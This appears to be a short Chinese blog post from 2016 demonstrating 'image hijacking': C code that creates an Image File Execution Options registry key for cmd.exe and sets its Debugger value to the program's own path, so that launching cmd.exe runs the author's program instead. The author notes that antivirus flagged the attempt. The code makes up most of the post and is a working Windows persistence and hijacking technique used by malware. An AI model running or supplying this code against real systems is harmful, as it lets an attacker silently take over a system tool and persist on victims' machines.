映像劫持技术(2):实例

在Image File Execution Options下创建cmd.exe项,将其“重定向”到我们自己编写的程序

 1 #include<stdio.h>
 2 #include<windows.h>
 3 
 4 int main()
 5 {
 6     HKEY hKey;
 7     DWORD dwDisposition=REG_CREATED_NEW_KEY;  //新建一个子项
 8     if((::RegCreateKeyEx(HKEY_LOCAL_MACHINE,
 9         "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Cmd.exe",
10         0,
11         NULL,
12         REG_OPTION_NON_VOLATILE,
13         KEY_ALL_ACCESS,
14         NULL,
15         &hKey,
16         &dwDisposition))==ERROR_SUCCESS)
17         {
18             printf("success to Create the reg key.\n");
19             char strPath[MAX_PATH];
20             int size=GetModuleFileName(NULL,strPath,sizeof(strPath));
21             int ret=RegSetValueEx(hKey,"Debugger",0,REG_SZ,(const unsigned char *)strPath,size);
22             if(ret==ERROR_SUCCESS)
23             {
24                 printf("success to set the registry keys.\n");
25             }
26             else
27             {
28                 printf("fail to set the registry keys.\n");
29             }
30             RegCloseKey(hKey);
31         }
32     else
33     {
34         printf("fail to create a reg key.\n");
35     }
36     return 0;
37 }

 程序运行的结果只是在创建了cmd.exe项目,在设置该项的值的时候,360安全卫士报毒了,设置不成功

posted @ 2016-01-01 04:17  廖凡  阅读(176)  评论(0编辑  收藏  举报